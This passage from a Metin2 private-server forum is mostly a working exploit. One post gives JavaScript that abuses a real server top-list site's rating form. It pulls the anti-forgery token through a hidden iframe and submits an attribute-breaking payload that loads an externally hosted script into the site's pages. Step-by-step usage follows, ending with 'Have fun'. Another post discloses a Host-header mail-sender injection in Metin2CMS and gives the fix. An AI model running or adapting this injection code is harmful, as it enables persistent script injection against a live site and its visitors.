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  1. What tools would you use to control the influence of a big server or would you do it manually to distribute the players everywhere on the map?
  2. Hi, Here is a small example of a code injection on the top list: metin2pserver.info. If you want to test it yourself: I hosted the following script here ( [Hidden Content] ): /** * Rate. * * @param {string} serverId * @param {string} name * @param {string} email * @param {number} rating * @option 1 - Insufficient * @option 2 - Inadequate * @option 3 - Sufficient * @option 4 - Satisfying * @option 5 - Good * @option 6 - Very good * @param {string} comment * @param {number} picture * @option 1 - Warrior (m) * @option 2 - Warrior (f) * @option 3 - Ninja (m) * @option 4 - Ninja (f) * @option 5 - Sura (m) * @option 6 - Sura (f) * @option 7 - Shaman (m) * @option 8 - Shaman (f) */ function rate(serverId, name, email, rating, comment, picture = 1) { const root = document.documentElement; const iframe = document.createElement('iframe'); iframe.style.setProperty('display', 'none'); iframe.src = `[Hidden Content]}`; return new Promise((resolve) => { iframe.onload = () => { const [s] = iframe.contentDocument.getElementsByName('s'); const token = s && s.value; root.removeChild(iframe); const data = { Name: name, Email: email, Rating: rating, Comments: comment, pic: picture, id: serverId, s: token, }; const params = []; for (const param in data) { const value = data[param]; params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value)); } const body = params.join('&'); if (token) { fetch(iframe.src, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', }, body, }) .then(() => resolve(true)) .catch(() => resolve(false)); } else { resolve(false); } }; root.appendChild(iframe); }); } if (location.hash === '#methowashere') { const serverId = /server-(.*?).html/.exec(location.href)[1]; const name = prompt('Your name'); const comment = prompt('Your comment'); rate(serverId, name, '', 1, comment); } To inject it, go to a server page (e. g.: [Hidden Content]). Launch this script on the page: /** * Rate. * * @param {string} serverId * @param {string} name * @param {string} email * @param {number} rating * @option 1 - Insufficient * @option 2 - Inadequate * @option 3 - Sufficient * @option 4 - Satisfying * @option 5 - Good * @option 6 - Very good * @param {string} comment * @param {number} picture * @option 1 - Warrior (m) * @option 2 - Warrior (f) * @option 3 - Ninja (m) * @option 4 - Ninja (f) * @option 5 - Sura (m) * @option 6 - Sura (f) * @option 7 - Shaman (m) * @option 8 - Shaman (f) */ function rate(serverId, name, email, rating, comment, picture = 1) { const root = document.documentElement; const iframe = document.createElement('iframe'); iframe.style.setProperty('display', 'none'); iframe.src = `[Hidden Content]}`; return new Promise((resolve) => { iframe.onload = () => { const [s] = iframe.contentDocument.getElementsByName('s'); const token = s && s.value; root.removeChild(iframe); const data = { Name: name, Email: email, Rating: rating, Comments: comment, pic: picture, id: serverId, s: token, }; const params = []; for (const param in data) { const value = data[param]; params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value)); } const body = params.join('&'); if (token) { fetch(iframe.src, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', }, body, }) .then(() => resolve(true)) .catch(() => resolve(false)); } else { resolve(false); } }; root.appendChild(iframe); }); } /** * Inject. * * @param {string} script * @param {string} name */ function injectScript(script, name = 'Dummy') { const serverId = /server-(.*?).html/.exec(location.href)[1]; const code = `$.getScript('${script}')`; const injection = `"style="animation:fb_transform"onanimationstart="${code}"`; console.log(`Server: ${serverId}`); console.log(`Name: ${name}`); console.log(`Script: ${script}`); console.log(`Injections: ${injection}`); return rate(serverId, name, injection, 1, '[...]'); } You can then inject it like this: injectScript('[Hidden Content]').then((r) => console.log('Result: ', r)); You can then test it like this: [Hidden Content] Have fun ?
  3. @FlasH Strange, i downloaded the lastest version, encountered the issue, fixed it, posted it on another forum and get in contact with him personally. My guess would be, he implemented it as a sort of feature and now reverted it back to its original state. Maybe he will answer too here @Ionuț
  4. Hello everybody, Since someone asked me about injections in Metin2CMS (targeted CMS: [Hidden Content]), I quickly looked at the code of the CMS mentioned. I also noticed a critical exploit that enables code injections. The file include\functions\sendEmail.php contains the following code: $site_name = $_SERVER['SERVER_NAME']; if ($site_name == 'localhost' || $site_name == '') $site_name = 'metin2cms.cf'; As of Apache 2, $_SERVER['SERVER_NAME'] can be transmitted from the client to the server via the http header Host (like for $_SERVER['HTTP_HOST'] too). An email is sent in the same file using PHPMailer and the sender is set as follows: $mail->SetFrom($email_name . '@' . $site_name, $site_title); The script include\mailer\PHPMailer.php validates the sender as follows: if (!empty($this->Sender) and static::validateAddress($this->Sender)) { if (self::isShellSafe($this->Sender)) { $params = sprintf('-f%s', $this->Sender); } } The validateAddress function uses FILTER_VALIDATE_EMAIL according to RFC 822, which is not sufficient to check e-mails. The isShellSafe function uses escapeshellcmd, which prevents additional commands from being executed, but it is still possible to pass additional parameters / flags that allow the execution of PHP code. I wrote with Ionut and thanks to him he already released a full solution for this here: [Hidden Content] Fix: Remove: $email_name = 'noreplay'; $site_name = $_SERVER['SERVER_NAME']; if ($site_name == 'localhost' || $site_name == '') $site_name = 'metin2cms.cf'; Replace: $mail->SetFrom($email_name . '@' . $site_name, $site_title); $mail->AddReplyTo($email_name . "@" . $site_name, $site_title); With: $mail->SetFrom($email_username, $site_title); $mail->AddReplyTo($email_username, $site_title); Btw, i would not suggest setting the variable through Apache using ServerName and UseCanonicalName. These variables should not be used in productive environments. Hope it helps. Also thanks to @martysama0134 who reached out to him.
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